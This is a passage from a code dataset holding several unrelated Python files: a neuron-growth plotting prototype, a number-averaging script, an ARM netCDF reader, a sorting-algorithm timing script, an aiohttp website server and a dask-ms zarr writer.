Axes3D\r\nimport numpy as np\r\n#import pylab\r\nimport itertools\r\nimport time\r\n#import inspect\r\n\r\n#create a test class for neuron\r\nclass neuron:\r\n    # init method creates the basic neuron attributes from the attribs list\r\n    def __init__(self, cfgNeuron):\r\n        self.name = cfgNeuron[0]\r\n        self.size = cfgNeuron[1]\r\n        self.nodeArray = np.zeros([1,3])\r\n        self.nodeList = []\r\n        self.branchList = []\r\n\r\n    # make an array containing all the voxels that are within the soma\r\n    #this is super slow\r\n#    def getSomaArray(self):\r\n#        self.somaVoxArray = np.fromiter(itertools.chain(*itertools.product(range(self.size),repeat=3)), dtype=int).reshape(-1,3)\r\n#        self.nodeArray=np.append(self.nodeArray,self.somaVoxArray,axis=0)\r\n#\r\n    #make a LIST with the voxels\r\n    #this is way faster \r\n    #Not a real list. It's a list of tuples. Might have to change that later\r\n    def getSomaList(self):\r\n        self.somaVoxList = list(itertools.product(range(self.size),repeat=2))\r\n        self.nodeList.extend(self.somaVoxList)\r\n    #grow every branch attached to this neuron (branch instances live in attributes named 'bi...')\r\n    def growNeuron(self):\r\n        self.isGrowing=1\r\n        self.isResting=0\r\n        # iterate over (name, value) pairs so the branch attributes can be found by name\r\n        for name, curb in self.__dict__.items():\r\n            if name[:2]=='bi':\r\n                print(name)\r\n                curb.growBranch()\r\n    def restNeuron(self):\r\n        self.isResting=1\r\n        self.isGrowing=0\r\n    def updateNeuron(self):\r\n        #update the neuron voxlist so it includes the branches\r\n        print(\"updating neuron\")\r\n        for branch,nodeList in self.__dict__.items():\r\n            if branch[:2]=='bi':\r\n                self.nodeList.extend(nodeList.nodeList)\r\n\r\n\r\n\r\n    #For now, I'm going to define the neurite class within the neuron class\r\n    class branch:\r\n        def __init__(self, cfgBranch):\r\n            self.name = cfgBranch[0]\r\n            self.root = cfgBranch[1]\r\n            self.growthRate = cfgBranch[2]\r\n            self.tortuosity = cfgBranch[3]\r\n            self.direction = [0,1]\r\n            self.tip = self.root\r\n            self.nodeList = []\r\n        def growBranch(self):\r\n            self.tip=[sum(x) for x in zip(self.tip,self.direction)]\r\n            #I think that I want extend.\r\n            self.nodeList.append(tuple(self.tip))\r\n            self.isGrowing=1\r\n            self.isResting=0\r\n        def restBranch(self):\r\n            self.isResting=1\r\n            self.isGrowing=0\r\n\r\n\r\n#Time to initialize is essentially zero. Probably because we haven't made anything\r\nstartNeurGen=time.time()\r\nstartAttribs=(\"steve\",10)\r\nneur1 = neuron(startAttribs)\r\nneur1.bi1 = neur1.branch([\"steveBranch1\",[11,11], 1, 1])\r\nneur1.bi2 = neur1.branch([\"steveBranch2\",[1,11], 1, 1])\r\n#neur1.branchList.append(\"branchInst1\")\r\n#neur1.branchList.append(\"branchInst2\")\r\nfinishNeurGen=time.time()\r\nprint('neurGenTime=',finishNeurGen-startNeurGen)\r\n\r\n\r\n#The array method is super slow.\r\n#startArray=time.time()\r\n#neur1.getSomaArray()\r\n#finishArray=time.time()\r\n#print('arrayTime=',finishArray-startArray)\r\n\r\n#Manipulation of the list appears to be 5x-10x faster than the array\r\n#I can also probably remove things faster there.\r\nstartList=time.time()\r\nneur1.getSomaList()\r\nfinishList=time.time()\r\nprint('listTime=',finishList-startList)\r\n\r\n#Plotting the array is way faster than plotting the list\r\n#def plotNeurArray(neur):\r\n#    startPlotArray=time.time()\r\n#    fig = plt.figure()\r\n#    ax = fig.add_subplot(111, projection='2d')\r\n#    ax.scatter(neur.somaVoxArray[:,0],neur.somaVoxArray[:,1],neur.somaVoxArray[:,2])\r\n#    finishPlotArray=time.time()\r\n#    print('plotArray=',finishPlotArray-startPlotArray)\r\n\r\n#This is much slower than the array method. 
I will try it with a list->array step\r\n#def plotNeurList(neur):\r\n# startPlotList=time.time()\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111, projection='2d')\r\n# ax.scatter((zip(*neur.somaVoxList)[0]),(zip(*neur.somaVoxList)[1]),(zip(*neur.somaVoxList)[2]))\r\n# finishPlotList=time.time()\r\n# print('plotList=',finishPlotList-startPlotList)\r\n\r\n#This is seemingly the FASTEST, but that should be checked with scaling.\r\ndef plotNeurList2Array(neur):\r\n startPlotList2Array=time.time()\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n tempArray=np.array(neur.nodeList)\r\n ax.scatter(tempArray[:,0],tempArray[:,1])\r\n finishPlotList2Array=time.time()\r\n print(np.size(tempArray))\r\n print('plotList=',finishPlotList2Array-startPlotList2Array)\r\n\r\ninputFileName=\"ngSeed1.png\"\r\nrawArray = img.imread(inputFileName)\r\nplt.imshow(rawArray)\r\n\r\n#for x in range(20):\r\n# neur1.bi1.growBranch()\r\n# neur1.updateNeuron()\r\n# plotNeurList2Array(neur1)\r\n# print(x)\r\n\r\n#import code\r\n#code.interact(local=locals())\r\n\r\n\r\n\r\n######\r\n# Need to do some basic testing to find out if it is faster to put my overall\r\n# neuron voxel list in an array or in a list\r\n######\r\n","sub_path":"growTest_2d_img.py","file_name":"growTest_2d_img.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"603118735","text":"# THIS IS THE VARIABLE\ntotal = 0\naverage = 0\nnumberToAdd = 1\nenteredNumbersArray = []\n\nwhile numberToAdd != 0:\n # THIS IS WHERE THE USERS INPUT IT TAKEN IN.\n numberToAdd = int(input(\"Enter A Number To Add: \"))\n\n # THIS IS WHERE THE MATHMATICS IS DONE AND THINGS ARE ADDED TO ARRAY'S.\n enteredNumbersArray.append(numberToAdd)\n total = numberToAdd + total\n average = sum(enteredNumbersArray) / len(enteredNumbersArray)\n\n # THIS PRINT'S OUT THE TOTALS AND AVERAGES OF THE NUMBERS THAT HAVE BEEN ENTERED.\n print(\"|-- YOUR CURRENT TOTAL IS --|\")\n print(\"|--\", total)\n\n print(\"|-- YOUR CURRENT AVERAGE IS --|\")\n print(\"|--\", average)\n print(\" \")","sub_path":"3.6/3.6.py","file_name":"3.6.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"136244213","text":"from atmPy.data_archives.arm._netCDF import ArmDataset as _Dataset\nimport os as _os\nfrom atmPy.data_archives.arm import _tdmasize,_tdmaapssize,_tdmahyg,_aosacsm, _noaaaos, _1twr10xC1, _aipfitrh1ogrenC1\nimport pandas as _pd\nimport pylab as _plt\nimport warnings\nimport pdb as _pdb\n\narm_products = {'tdmasize': {'module': _tdmasize},\n 'tdmaapssize':{'module': _tdmaapssize},\n 'tdmahyg': {'module': _tdmahyg},\n 'aosacsm': {'module': _aosacsm},\n 'noaaaos': {'module': _noaaaos},\n '1twr10xC1': {'module': _1twr10xC1},\n 'aipfitrh1ogrenC1': {'module': _aipfitrh1ogrenC1}\n }\n\n\ndef check_availability(folder,\n data_product = None,\n site = 'sgp',\n time_window = ('1990-01-01','2030-01-01'),\n custom_product_keys = False,\n ignore_unknown = True,\n verbose = False):\n\n fname = _os.listdir(folder)\n index = _pd.date_range('1990-01-01','2030-01-01', freq = 'D')\n df = _pd.DataFrame(index = index)\n\n for f in fname:\n if verbose:\n print('\\n', f)\n\n # error handling: test for netCDF file format\n if _os.path.splitext(f)[-1] != '.cdf':\n txt = '\\t %s is not a netCDF file ... 
skipping'%f\n if verbose:\n print(txt)\n continue\n\n site_check = _is_site(f,site,verbose)\n if not site_check:\n continue\n\n date = _is_in_time_window(f,time_window,verbose)\n if not date:\n continue\n\n product_id = _is_in_product_keys(f, ignore_unknown, verbose, custom_product_keys = custom_product_keys)\n if not product_id:\n continue\n\n if not _is_desired_product(product_id,data_product,verbose):\n continue\n\n if product_id not in df.columns:\n df[product_id] = _pd.Series(1, index = [date])\n else:\n df[product_id][date] = 1\n\n df = df.sort(axis=1)\n\n for e,col in enumerate(df.columns):\n df[col].values[df[col].values == 1] = e+1\n\n\n f,a = _plt.subplots()\n for col in df.columns:\n a.plot(df.index,df[col], lw = 35, color = [0,0,1,0.3])\n\n a.set_ylim((0.1,df.shape[1] + 0.9))\n bla = range(1,df.shape[1]+1)\n a.yaxis.set_ticks(bla)\n a.yaxis.set_ticklabels(df.columns)\n\n f.autofmt_xdate()\n\n f.tight_layout()\n return df, a\n\n\ndef read_cdf(fname,\n site = 'sgp',\n data_product = None,\n time_window = None,\n data_quality = 'good',\n data_quality_flag_max = None,\n concat = True,\n ignore_unknown = False,\n leave_cdf_open = False,\n verbose = True,\n ):\n \"\"\"\n Reads ARM NetCDF file(s) and returns a containers with the results.\n\n Parameters\n ----------\n fname: str or list of str.\n Either a file, directory, or list of files. If directory name is given\n all files in the directory will be considered.\n data_product: str.\n To see a list of allowed products look at the variable arm_products.\n time_window: tuple of str.\n e.g. ('2016-01-25 15:22:40','2016-01-29 15:00:00').\n Currently the entire day is considered, no need to use exact times.\n concat\n ignore_unknown\n verbose\n\n Returns\n -------\n\n \"\"\"\n\n # list or single file\n if type(fname) == str:\n if fname[-1] == '/':\n f = _os.listdir(fname)\n fname = [fname + i for i in f]\n else:\n fname = [fname]\n\n if len(fname) > 1 and leave_cdf_open:\n txt = \"leave_cdf_open can only be true if the number of files is one ... leave_cdf_open = False\"\n warnings.warn(txt)\n leave_cdf_open = False\n\n if type(data_product) == str:\n data_product = [data_product]\n products = {}\n\n #loop thru files\n for f in fname:\n if verbose:\n print('\\n', f)\n\n # error handling: test for netCDF file format\n # _pdb.set_trace()\n if _os.path.splitext(f)[-1] != '.cdf':\n txt = '\\t %s is not a netCDF file ... skipping'%f\n if verbose:\n print(txt)\n continue\n\n if not _is_in_time_window(f,time_window,verbose):\n continue\n\n product_id = _is_in_product_keys(f, ignore_unknown, verbose)\n if not product_id:\n continue\n\n site_check = _is_site(f,site,verbose)\n if not site_check:\n continue\n\n if not _is_desired_product(product_id,data_product,verbose):\n continue\n\n if product_id not in products.keys():\n products[product_id] = []\n\n\n arm_file_object = arm_products[product_id]['module'].ArmDatasetSub(f, data_quality = data_quality, data_quality_flag_max = data_quality_flag_max)\n\n if not leave_cdf_open:\n arm_file_object._close()\n\n products[product_id].append(arm_file_object)\n\n if len(fname) == 1:\n return arm_file_object\n\n else:\n if concat:\n for pf in products.keys():\n products[pf] = arm_products[pf]['module']._concat_rules(products[pf])\n return products\n\n\ndef _is_desired_product(product_id, data_product, verbose):\n out = True\n if data_product:\n if product_id not in data_product:\n if verbose:\n print('Not the desired data product ... 
skip')\n out = False\n return out\n\ndef _is_site(f,site,verbose):\n out = True\n fnt = _os.path.split(f)[-1].split('.')[0]\n site_is = fnt[:3]\n if site:\n if site_is != site:\n out = False\n if verbose:\n txt = 'Has wrong site_id (%s) ... skip!'%(site_is)\n print(txt)\n return out\n\ndef _is_in_product_keys(f, ignore_unknown,verbose, custom_product_keys = False):\n\n fnt = _os.path.split(f)[-1].split('.')\n product_id = False\n for prod in arm_products.keys():\n if prod in fnt[0]:\n product_id = prod\n break\n\n if custom_product_keys:\n for prod in custom_product_keys:\n if prod in fnt[0]:\n product_id = prod\n return product_id\n\n if not product_id:\n txt = '\\t has no ncattr named platform_id. Guess from file name failed ... skip'\n if verbose:\n print(txt)\n else:\n if product_id not in arm_products.keys():\n txt = 'Platform id %s is unknown.'%product_id\n product_id = False\n if ignore_unknown:\n if verbose:\n print(txt + '... skipping')\n else:\n raise KeyError(txt)\n return product_id\n\ndef _is_in_time_window(f,time_window, verbose):\n out = True\n if time_window:\n fnt = _os.path.split(f)[-1].split('.')\n ts = fnt[-3]\n file_start_data = _pd.to_datetime(ts)\n start_time = _pd.to_datetime(time_window[0])\n end_time = _pd.to_datetime(time_window[1])\n dt_start = file_start_data - start_time\n dt_end = file_start_data - end_time\n out = file_start_data\n\n if dt_start.total_seconds() < -86399:\n if verbose:\n print('outside (before) the time window ... skip')\n out = False\n elif dt_end.total_seconds() > 86399:\n if verbose:\n print('outside (after) the time window ... skip')\n out = False\n return out","sub_path":"atmPy/data_archives/arm/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":7531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"347690638","text":"# Wren Group\n\nimport time \nimport random\nimport copy\n\n# Below are the two sorting methods we used, Insertion and Selection sort.\n\ndef insertion_sort(arr):\n for k in range(1, len(arr)):\n cur = arr[k]\n j = k\n while j>0 and arr[j-1]>cur:\n arr[j]=arr[j-1]\n j = j-1\n arr[j] = cur\n\ndef selection_sort(arr):\n for i in range(len(arr)):\n max = i\n count = i+1\n \n while (count < len(arr)):\n if arr[count] < arr[i]:\n max = count\n temp = arr[max]\n arr[max] = arr[i]\n arr[i] = temp\n count += 1\n\n#______________________________________________________________________________________\n\nif __name__ == '__main__':\n\n#Below are the 30 individual trials. They are grouped by 1000, 2500, 5000, 7500, 10000.\n#The arrays are numbered 1-30 and are grouped two more times -- Once by either Increasing,\n#Decreasing, or Random, and then again by Insertion or Selection sort. We imported and\n#used Copy to remember the first array listed in the group so when we moved on to\n#Selection sort, it did not pull from the already sorted Insertion sort. This also keeps\n#the data consistent when comparing the two sort methods since the unsorted arrays are =. 
\n\n array_1 = []\n \n for i in range(0,999):\n array_1.append(i)\n array_2 = copy.copy(array_1)\n \nstart = time.clock()\ninsertion_sort(array_1)\nend = time.clock()\n\nprint('1000 Increasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_2)\nend = time.clock()\n\nprint('1000 Increasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_3 = []\n\nfor i in range(999,0,-1):\n array_3.append(i)\narray_4 = copy.copy(array_3)\n\nstart = time.clock()\ninsertion_sort(array_3)\nend = time.clock()\n\nprint('1000 Decreasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_4)\nend = time.clock()\n\nprint('1000 Decreasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_5 = []\ni = 0\nwhile(i<=1000):\n d = random.randint(1,99)\n array_5.append(d)\n i+=1\n \narray_6 = copy.copy(array_5)\n\nstart = time.clock()\ninsertion_sort(array_5)\nend = time.clock()\n\nprint('1000 Random Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_6)\nend = time.clock()\n\nprint('1000 Random Selection: ' + '{:.20f}'.format(end-start))\n\n#______________________________________________________________________________________\n\narray_7 = []\n \nfor i in range(0,2500):\n array_7.append(i)\narray_8 = copy.copy(array_7)\n \nstart = time.clock()\ninsertion_sort(array_7)\nend = time.clock()\n\nprint('2500 Increasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_8)\nend = time.clock()\n\nprint('2500 Increasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_9 = []\n\nfor i in range(2500,0,-1):\n array_9.append(i)\narray_10 = copy.copy(array_9)\n\nstart = time.clock()\ninsertion_sort(array_9)\nend = time.clock()\n\nprint('2500 Decreasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_10)\nend = time.clock()\n\nprint('2500 Decreasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_11 = []\ni = 0\nwhile(i<=2500):\n d = random.randint(1,99)\n array_11.append(d)\n i+=1\n \narray_12 = copy.copy(array_11)\n\nstart = time.clock()\ninsertion_sort(array_11)\nend = time.clock()\n\nprint('2500 Random Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_12)\nend = time.clock()\n\nprint('2500 Random Selection: ' + '{:.20f}'.format(end-start))\n\n#______________________________________________________________________________________\n\narray_13 = []\n \nfor i in range(0,5000):\n array_13.append(i)\narray_14 = copy.copy(array_13)\n \nstart = time.clock()\ninsertion_sort(array_13)\nend = time.clock()\n\nprint('5000 Increasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_14)\nend = time.clock()\n\nprint('5000 Increasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_15 = []\n\nfor i in range(5000,0,-1):\n array_15.append(i)\narray_16 = copy.copy(array_15)\n\nstart = time.clock()\ninsertion_sort(array_15)\nend = time.clock()\n\nprint('5000 Decreasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_16)\nend = time.clock()\n\nprint('5000 Decreasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_17 = []\ni = 0\nwhile(i<=5000):\n d = random.randint(1,99)\n 
array_17.append(d)\n i+=1\n \narray_18 = copy.copy(array_17)\n\nstart = time.clock()\ninsertion_sort(array_17)\nend = time.clock()\n\nprint('5000 Random Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_18)\nend = time.clock()\n\nprint('5000 Random Selection: ' + '{:.20f}'.format(end-start))\n\n#______________________________________________________________________________________\n\narray_19 = []\n \nfor i in range(0,7500):\n array_19.append(i)\narray_20 = copy.copy(array_19)\n \nstart = time.clock()\ninsertion_sort(array_19)\nend = time.clock()\n\nprint('7500 Increasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_20)\nend = time.clock()\n\nprint('7500 Increasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_21 = []\n\nfor i in range(7500,0,-1):\n array_21.append(i)\narray_22 = copy.copy(array_21)\n\nstart = time.clock()\ninsertion_sort(array_21)\nend = time.clock()\n\nprint('7500 Decreasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_22)\nend = time.clock()\n\nprint('7500 Decreasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_23 = []\ni = 0\nwhile(i<=7500):\n d = random.randint(1,99)\n array_23.append(d)\n i+=1\n \narray_24 = copy.copy(array_23)\n\nstart = time.clock()\ninsertion_sort(array_23)\nend = time.clock()\n\nprint('7500 Random Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_24)\nend = time.clock()\n\nprint('7500 Random Selection: ' + '{:.20f}'.format(end-start))\n\n#______________________________________________________________________________________\n\narray_25 = []\n \nfor i in range(0,10000):\n array_25.append(i)\narray_26 = copy.copy(array_25)\n \nstart = time.clock()\ninsertion_sort(array_25)\nend = time.clock()\n\nprint('10,000 Increasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_26)\nend = time.clock()\n\nprint('10,000 Increasing Selection: ' + '{:.20f}'.format(end-start))\n\n#_____________________________________\n\narray_27 = []\n\nfor i in range(10000,0,-1):\n array_27.append(i)\narray_28 = copy.copy(array_27)\n\nstart = time.clock()\ninsertion_sort(array_27)\nend = time.clock()\n\nprint('10,000 Decreasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_28)\nend = time.clock()\n\nprint('10,000 Decreasing Selection: ' + '{:.20f}'.format(end-start))\n\n#_____________________________________\n\narray_29 = []\ni = 0\nwhile(i<=10000):\n d = random.randint(1,99)\n array_29.append(d)\n i+=1\n \narray_30 = copy.copy(array_29)\n\nstart = time.clock()\ninsertion_sort(array_29)\nend = time.clock()\n\nprint('10,000 Random Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_30)\nend = time.clock()\n\nprint('10,000 Random Selection: ' + '{:.20f}'.format(end-start))\n\n#______________________________________________________________________________________","sub_path":"Sort.py","file_name":"Sort.py","file_ext":"py","file_size_in_byte":7588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"360301874","text":"from aiohttp import web\nimport aiohttp_jinja2\nimport jinja2\nimport asyncio\nimport posixpath\nimport ssl\nfrom os.path import isfile\n\nfrom data.products import products, product_by_name\nfrom data.other import intro, technical, 
address, more, epc\nimport data.download as download_data\nfrom data.walker.walk import FileInfo, walk\nfrom translator.translator import translator, all_languages\n\nfrom typing import Dict, List, Optional\n\nfiles: Dict[str, Dict[str, List[FileInfo]]] = {} # Download page files, must be initialized\n\n\nroutes = web.RouteTableDef()\n\n\ndef translatable_template(func):\n async def handler(request):\n language = request.match_info.get(\"language\", \"ru\")\n tr = translator(language)\n\n result = await func(request)\n\n # Link to current page without /ru or /en prefix\n current_link_nolang = posixpath.join(*request.path.split(\"/\")[2:])\n\n # Links to ru, en, ... etc versions of current page\n languages_links = {f\"{lang}_link\": posixpath.join(\"/\"+lang, current_link_nolang) for lang in all_languages}\n return {\"tr\": tr,\n \"lang\": language,\n **languages_links,\n **result}\n return handler\n\n\ndef base_template(func):\n async def handler(request):\n result = await func(request)\n return {\"address\": address,\n \"epc\": epc,\n **result}\n return translatable_template(handler)\n\n\n@routes.get(\"/\")\nasync def index(request):\n raise web.HTTPFound(location=\"/ru/\") # redirect to default language\n\n\n@routes.get(\"/{language}/\")\n@aiohttp_jinja2.template(\"index.html\")\n@base_template\nasync def index(request):\n return {\"intro\": intro,\n \"products\": products,\n \"technical\": technical,\n \"more\": more\n }\n\n\n@routes.get(\"/{language}/product/{product}/\")\n@aiohttp_jinja2.template(\"download.html\")\n@base_template\nasync def download(request):\n product = product_by_name(request.match_info[\"product\"])\n\n return {\"product\": product,\n \"all_software\": files[product.name],\n \"version\": download_data.version,\n \"release_date\": download_data.release_date,\n \"size\": download_data.size,\n \"link\": download_data.link,\n \"download\": download_data.download,\n \"software_type\": download_data.software_category_by_name\n }\n\n\n# TODO: use nginx\nroutes.static('/static', \"view/static\")\n\n\nasync def walk_periodic(path: str, url_prefix: str):\n global files\n while True:\n files = walk(path, url_prefix)\n await asyncio.sleep(300) # Update every 5 minutes\n\n\ndef _app_factory() -> web.Application:\n app = web.Application()\n aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader('view/templates'))\n\n app.router.add_routes(routes)\n\n return app\n\n\nasync def _server_factory(keyfile: Optional[str] = None, certfile: Optional[str] = None) -> web.TCPSite:\n app = _app_factory()\n runner = web.AppRunner(app)\n await runner.setup()\n\n ssl_ctx = None\n if keyfile or certfile:\n ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n ssl_ctx.load_cert_chain(certfile=certfile, keyfile=keyfile)\n\n site = web.TCPSite(runner, ssl_context=ssl_ctx)\n return site\n\n\nasync def main():\n walker_coro = walk_periodic(\"view/static/download\", \"/static/download\") # periodic run\n asyncio.create_task(walker_coro)\n\n http_server_coro = (await _server_factory()).start()\n asyncio.create_task(http_server_coro)\n\n cert, key = \"fullchain.pem\", \"privkey.pem\"\n if isfile(cert) and isfile(key):\n https_server_coro = (await _server_factory(keyfile=key, certfile=cert)).start()\n asyncio.create_task(https_server_coro)\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n 
loop.run_forever()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"172277734","text":"from pathlib import Path\n\nimport dask\nimport dask.array as da\nfrom dask.array.core import normalize_chunks\nfrom dask.base import tokenize\nimport numcodecs\nimport numpy as np\n\nfrom daskms.constants import DASKMS_PARTITION_KEY\nfrom daskms.dataset import Dataset, Variable\nfrom daskms.dataset_schema import (\n DatasetSchema,\n encode_type,\n decode_type,\n decode_attr)\nfrom daskms.experimental.utils import (\n extent_args,\n select_vars_and_coords,\n column_iterator,\n promote_columns)\nfrom daskms.optimisation import inlined_array\nfrom daskms.utils import requires\nfrom daskms.fsspec_store import DaskMSStore\n\ntry:\n import zarr\nexcept ImportError as e:\n zarr_import_error = e\nelse:\n zarr_import_error = None\n\n\nDASKMS_ATTR_KEY = \"__daskms_zarr_attr__\"\n\n\ndef zarr_chunks(column, dims, chunks):\n if chunks is None:\n return None\n\n zchunks = []\n\n for dim, dim_chunks in zip(dims, chunks):\n if any(np.isnan(dc) for dc in dim_chunks):\n raise NotImplementedError(\n f\"Column {column} has nan chunks \"\n f\"{dim_chunks} in dimension {dim} \"\n f\"This is not currently supported\")\n\n unique_chunks = set(dim_chunks[:-1])\n\n if len(unique_chunks) == 0:\n zchunks.append(dim_chunks[-1])\n elif len(unique_chunks) == 1:\n zchunks.append(dim_chunks[0])\n else:\n raise NotImplementedError(\n f\"Column {column} has heterogenous chunks \"\n f\"{dim_chunks} in dimension {dim} \"\n f\"zarr does not currently support this\")\n\n return tuple(zchunks)\n\n\ndef create_array(ds_group, column, column_schema,\n schema_chunks, coordinate=False):\n\n codec = numcodecs.Pickle() if column_schema.dtype == object else None\n\n if column_schema.chunks is None:\n try:\n # No column chunking found, probably an ndarray,\n # derive column chunking from chunks on dataset\n chunks = tuple(schema_chunks[d] for d in column_schema.dims)\n except KeyError:\n # Nope, just set chunks equal to dimension size\n chunks = tuple((s,) for s in column_schema.shape)\n else:\n chunks = column_schema.chunks\n\n zchunks = zarr_chunks(column, column_schema.dims, chunks)\n\n array = ds_group.require_dataset(column, column_schema.shape,\n chunks=zchunks,\n dtype=column_schema.dtype,\n object_codec=codec,\n exact=True)\n\n if zchunks is not None:\n # Expand zarr chunks to full dask resolution\n # For comparison purposes\n zchunks = normalize_chunks(array.chunks, column_schema.shape)\n\n if zchunks != chunks:\n raise ValueError(\n f\"zarr chunks {zchunks} \"\n f\"don't match dask chunks {column_schema.chunks}. 
\"\n f\"This can cause data corruption as described in \"\n f\"https://zarr.readthedocs.io/en/stable/tutorial.html\"\n f\"#parallel-computing-and-synchronization\")\n\n array.attrs[DASKMS_ATTR_KEY] = {\n \"dims\": column_schema.dims,\n \"coordinate\": coordinate,\n \"array_type\": encode_type(column_schema.type),\n }\n\n\ndef prepare_zarr_group(dataset_id, dataset, store):\n try:\n # Open in read/write, must exist\n group = zarr.open_group(store=store.map, mode=\"r+\")\n except zarr.errors.GroupNotFoundError:\n # Create, must not exist\n group = zarr.open_group(store=store.map, mode=\"w-\")\n\n group_name = f\"{store.table}_{dataset_id}\"\n ds_group = group.require_group(store.table).require_group(group_name)\n\n schema = DatasetSchema.from_dataset(dataset)\n schema_chunks = schema.chunks\n\n for column, column_schema in schema.data_vars.items():\n create_array(ds_group, column, column_schema, schema_chunks, False)\n\n for column, column_schema in schema.coords.items():\n create_array(ds_group, column, column_schema, schema_chunks, True)\n\n ds_group.attrs.update({\n **schema.attrs,\n DASKMS_ATTR_KEY: {\"chunks\": dict(dataset.chunks)}\n })\n\n return ds_group\n\n\ndef zarr_setter(data, name, group, *extents):\n try:\n zarray = getattr(group, name)\n except AttributeError:\n raise ValueError(f\"{name} is not a variable of {group}\")\n\n selection = tuple(slice(start, end) for start, end in extents)\n zarray[selection] = data\n return np.full((1,)*len(extents), True)\n\n\ndef _gen_writes(variables, chunks, factory, indirect_dims=False):\n for name, var in variables.items():\n if isinstance(var.data, da.Array):\n ext_args = extent_args(var.dims, var.chunks)\n var_data = var.data\n elif isinstance(var.data, np.ndarray):\n try:\n var_chunks = tuple(chunks[d] for d in var.dims)\n except KeyError:\n var_chunks = tuple((s,) for s in var.shape)\n ext_args = extent_args(var.dims, var_chunks)\n var_data = da.from_array(var.data, chunks=var_chunks,\n inline_array=True, name=False)\n else:\n raise NotImplementedError(f\"Writing {type(var.data)} \"\n f\"unsupported\")\n\n if var_data.nbytes == 0:\n continue\n\n token_name = (f\"write~{name}-\"\n f\"{tokenize(var_data, name, factory, *ext_args)}\")\n\n write = da.blockwise(zarr_setter, var.dims,\n var_data, var.dims,\n name, None,\n factory, None,\n *ext_args,\n adjust_chunks={d: 1 for d in var.dims},\n concatenate=False,\n name=token_name,\n meta=np.empty((1,)*len(var.dims), bool))\n write = inlined_array(write, ext_args[::2])\n\n # Alter the dimension names to preserve laziness on coordinates.\n dims = [f\"_{d}_\" for d in var.dims] if indirect_dims else var.dims\n\n yield name, (dims, write, var.attrs)\n\n\n@requires(\"pip install dask-ms[zarr] for zarr support\",\n zarr_import_error)\ndef xds_to_zarr(xds, store, columns=None):\n \"\"\"\n Stores a dataset of list of datasets defined by `xds` in\n file location `store`.\n\n Parameters\n ----------\n xds : Dataset or list of Datasets\n Data\n store : str or Path\n Path to store the data\n columns : list of str or str or None\n Columns to store. 
`None` or `\"ALL\"` stores all columns on each dataset.\n Otherwise, a list of columns should be supplied.\n\n Returns\n -------\n writes : Dataset\n A Dataset representing the write operations\n \"\"\"\n if isinstance(store, DaskMSStore):\n pass\n elif isinstance(store, Path):\n store = DaskMSStore(f\"file://{store}\")\n elif isinstance(store, str):\n store = DaskMSStore(f\"file://{store}\")\n else:\n raise TypeError(f\"store '{store}' must be \"\n f\"Path, str or DaskMSStore\")\n\n columns = promote_columns(columns)\n\n if isinstance(xds, Dataset):\n xds = [xds]\n elif isinstance(xds, (tuple, list)):\n if not all(isinstance(ds, Dataset) for ds in xds):\n raise TypeError(\"xds must be a Dataset or list of Datasets\")\n else:\n raise TypeError(\"xds must be a Dataset or list of Datasets\")\n\n write_datasets = []\n\n for di, ds in enumerate(xds):\n group = prepare_zarr_group(di, ds, store)\n\n data_vars, coords = select_vars_and_coords(ds, columns)\n data_vars = dict(_gen_writes(data_vars, ds.chunks, group))\n # Include coords in the write dataset so they're reified\n data_vars.update(dict(_gen_writes(coords, ds.chunks, group,\n indirect_dims=True)))\n\n # Transfer any partition information over to the write dataset\n partition = ds.attrs.get(DASKMS_PARTITION_KEY, False)\n\n if not partition:\n attrs = None\n else:\n attrs = {DASKMS_PARTITION_KEY: partition,\n **{k: getattr(ds, k) for k, _ in partition}}\n\n write_datasets.append(Dataset(data_vars, attrs=attrs))\n\n return write_datasets\n\n\ndef zarr_getter(zarray, *extents):\n return zarray[tuple(slice(start, end) for 